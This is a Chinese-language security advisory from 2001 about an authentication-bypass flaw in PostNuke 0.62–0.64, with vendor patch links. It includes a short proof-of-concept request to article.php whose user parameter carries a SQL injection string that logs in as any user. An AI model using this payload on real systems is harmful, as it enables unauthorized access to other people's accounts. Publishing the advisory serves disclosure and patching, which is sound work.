首页 -> 安全研究

安全研究

安全漏洞
PostNuke 未授权的用户登陆漏洞

发布日期:2001-10-13
更新日期:2001-10-16

受影响系统:

PostNuke 0.62
PostNuke 0.63
PostNuke 0.64
   - Apache Group Apache 1.3.20
   - Apache Group Apache 1.3.20win32
描述:

BUGTRAQ ID : 3435

PostNuke是在PHPNuke的基础上改进的内容管理系统,发现其0.62到0.64版本存在一个
安全漏洞,导致远程攻击者只要知道用户名和用户ID即可不经过认证就登陆进入系统。

“article.php”调用“mainfile2.php”中的一个函数“getusrinfo()”更新用户信
息, 该函数进行了一次数据库查询,但是由于该查询使用了一个不安全的变量,导致
攻击者可能改变这个查询串,从而绕过认证直接进入系统。

<*来源:Magnus Skjegstad (lists@skjegstad.com
  参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0088.html
*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Magnus Skjegstad (lists@skjegstad.com)提供了如下测试代码:

article.php?save=1&
sid=20&      [any sid will do..]
cookieusrtime=160000&     [to get a decent expire-date on the cookie]
user=USERID:USERNAME:'  or uname='USERNAME      [base64_encoded]



建议:

厂商补丁:

目前厂商已经发布了补丁程序,请到厂商的主页下载:
http://prdownloads.sourceforge.net/post-nuke/64Mutant_Fix_article.zip
您也可以在厂商主页上升级到最新版本:
https://sourceforge.net/projects/post-nuke/

浏览次数:3537
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障